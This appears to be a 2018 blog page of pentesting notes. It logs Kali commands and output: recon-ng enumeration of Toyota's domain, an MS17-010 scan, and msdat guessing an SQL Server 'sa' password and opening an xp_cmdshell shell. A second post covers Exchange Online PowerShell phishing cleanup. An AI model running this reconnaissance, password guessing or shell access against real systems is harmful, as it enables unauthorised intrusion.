Tuesday, 7 August 2018

Kali Linux


Kali Linux
Nikto Web Scanner:
root@kali:/# nikto -h kali.org -p 80
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.124.249.10
+ Target Hostname:    kali.org
+ Target Port:        80
+ Start Time:         2018-08-07 04:59:05 (GMT-4)
---------------------------------------------------------------------------
+ Server: Sucuri/Cloudproxy

theHarvester:
root@kali:~# theharvester -d kali.org -b google

recon-ng
[recon-ng][default] > show workspaces
[recon-ng][default] > workspaces add toyota
[recon-ng][toyota] > show domains
[recon-ng][toyota] > add domains
domain (TEXT): toyota.com
[recon-ng][toyota] > show domains
  +------------------------------------------------+
  | rowid |   domain     |    module         |
  +------------------------------------------------+
  | 1         | toyota.com | user_defined |
  +------------------------------------------------+
[*] 1 rows returned

[recon-ng][toyota] > use google_site_web
[recon-ng][toyota][google_site_web] > run
[recon-ng][toyota][google_site_web] > show hosts
  | 3     | www.toyota.com  |                 |        |         |          |           | google_site_web |

[recon-ng][toyota] > use bing_domain_web
[recon-ng][toyota][bing_domain_web] > run
[recon-ng][toyota][bing_domain_web] > show hosts
 | 602   | www.fleet.toyota.com  |     |        |         |     |    | bing_domain_web |

[recon-ng][toyota] > use hackertarget
[recon-ng][toyota][hackertarget] > run
[recon-ng][toyota][hackertarget] > show hosts
 | 41    | toyota.com  | 107.154.75.95   |        |         |          |           | hackertarget    |

[recon-ng][toyota] > use recon/hosts-hosts/resolve
[recon-ng][toyota][resolve] > run
[recon-ng][toyota][resolve] > show hosts
 | 3     | www.toyota.com  | 54.239.216.57   |   |   |     |      | google_site_web |

[recon-ng][toyota] > use brute_hosts
[recon-ng][toyota][brute_hosts] > run
[recon-ng][toyota][brute_hosts] > show hosts
  | 772   | www.toyota.com | 13.33.172.193   |        |         |      |      | brute_hosts  

[recon-ng][toyota] > use mx_spf_ip
[recon-ng][toyota][mx_spf_ip] > run
[*] Retrieving MX records for toyota.com.
[*] [host] mxa-001f1301.gslb.pphosted.com (<blank>)
[*] [host] mxb-001f1301.gslb.pphosted.com (<blank>)
[recon-ng][toyota][mx_spf_ip] > show hosts
  | 675   | mxa-001f1301.gslb.pphosted.com  |   |  |  | |           | mx_spf_ip 

[recon-ng][toyota] > use reporting/xlsx
[recon-ng][toyota][xlsx] > run
[*] All data written to '/root/.recon-ng/workspaces/toyota/results.xlsx'.



Detect MS17-010 SMB vulnerability using Metasploit:
root@kali:/# netdiscover -r 10.12.0.0/24
root@kali:/# masscan -p135,445 10.12.0.21
Starting masscan 1.0.3 (http://bit.ly/14GZzcT) at 2018-08-21 07:23:08 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [2 ports/host]
Discovered open port 445/tcp on 10.12.0.21
Discovered open port 135/tcp on 10.12.0.21
root@kali:/# msfconsole
msf > use auxiliary/scanner/smb/smb_ms17_010
msf auxiliary(scanner/smb/smb_ms17_010) > set rhosts 10.12.0.21
msf auxiliary(scanner/smb/smb_ms17_010) > run
[+] 10.12.0.21:445       - Host is likely VULNERABLE to MS17-010! - Windows Server 2003 R2 3790 Service Pack 2 x86 (32-bit)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

#################################################
https://haveibeenpwned.com/

#################################################
msdat: Microsoft SQL Database Attacking Tool
sudo apt-get install freetds-dev
root@kali:/msdat# vim /etc/freetds/freetds.conf
#Add "use ntlmv2 = yes" in your freetds configuration file
[global]
        # TDS protocol version
        tds version = auto
        use ntlmv2 = yes
git clone https://github.com/quentinhardy/msdat.git
root@kali:/# cd /msdat/
root@kali:/msdat# ./msdat.py passwordguesser -s 10.0.0.23
[1] (10.0.0.23:1433): Searching valid accounts on the 10.0.0.23 server, port 1433
The login sa has already been tested at least once. What do you want to do:                                                                            | ETA:  00:00:00
- stop (s/S)
- continue and ask every time (a/A)
- continue without to ask (c/C)
c
100% |#################################################################################################################################################| Time: 00:00:01
[+] Accounts found on 10.0.0.23:1433/master: {'sa': 'sa'}
root@kali:/msdat# ./msdat.py xpcmdshell -s 10.0.0.23 -U 'sa' -P 'sa' --shell
[1] (10.0.0.23:1433): Trying to get a shell thanks to xpcmdshell
10.0.0.23$hostname

Posted by at

Friday, 3 August 2018

Microsoft Exchange Online Powershell



Connect to Exchange online PowerShell for Windows:
$UserCredential = Get-Credential "hostadmin@mycompany.com.my"

$Session = New-PSSession -ConfigurationName Microsoft.Exchange -ConnectionUri https://outlook.office365.com/powershell-liveid/ -Credential $UserCredential -Authentication Basic -AllowRedirection

Import-PSSession $Session

To remove sessions:
Get-PSSession | Remove-PSSession

#########################################################
Microsoft Exchange Online Powershell Module:
You will need a Windows machine with the latest version of Powershell. You will need to specifically install Exchange Online Powershell with MFA Support. This can be downloaded from
https://docs.microsoft.com/en-us/powershell/exchange/exchange-online/connect-to-exchange-online-powershell/mfa-connect-to-exchange-online-powershell?view=exchange-ps
OR
https://cmdletpswmodule.blob.core.windows.net/exopsmodule/Microsoft.Online.CSE.PSModule.Client.application
 (you may have to download in IE/Edge)

When running these Powershell scripts you will see a message along the lines of “WARNING: The names of…” – this is an issue with Microsoft not documenting their Official Powershell scripts well enough! But it is not an issue to worry about.












#Import the right Exchange Online module to talk with Azure AD
Import-Module $((Get-ChildItem -Path $($env:LOCALAPPDATA+"\Apps\2.0\") -Filter Microsoft.Exchange.Management.ExoPowershellModule.dll -Recurse ).FullName|?{$_ -notmatch "_none_"}|select -First 1)
#Auth to the tenant and setup powershell
$ExoSession = New-ExoPSSession
Import-PSSession $ExoSession -AllowClobber

#########################################################


Content Search in Office 365 Security & Compliance:





Deletes the search results returned by a content search named Remove Phishing Message:
















PS C:\>Import-Module $((Get-ChildItem -Path $($env:LOCALAPPDATA+"\Apps\2.0\") -Filter Microsoft.Exchange.Management.ExoPowershellModule.dll -Recurse ).FullName|?{$_ -notmatch "_none_"}|select -First 1)
PS C:\>$ExoSession = New-ExoPSSession -ConnectionUri https://ps.compliance.protection.outlook.com/powershell-liveid
PS C:\>Import-PSSession $ExoSession -AllowClobber
PS C:\>New-ComplianceSearchAction -SearchName "Remove Phishing Message" -Purge -PurgeType SoftDelete



Phishingcleanup.ps1 Script
param (

    [Parameter(Mandatory=$true)][string]$ComplianceName
)

Import-Module $((Get-ChildItem -Path $($env:LOCALAPPDATA+"\Apps\2.0\") -Filter Microsoft.Exchange.Management.ExoPowershellModule.dll -Recurse ).FullName|?{$_ -notmatch "_none_"}|select -First 1)
$ExoSession = New-ExoPSSession -ConnectionUri https://ps.compliance.protection.outlook.com/powershell-liveid
Import-PSSession $ExoSession -AllowClobber

New-ComplianceSearchAction -SearchName $ComplianceName -Purge -PurgeType SoftDelete

Get-PSSession | Remove-PSSession
Posted by at
Subscribe to: Posts (Atom)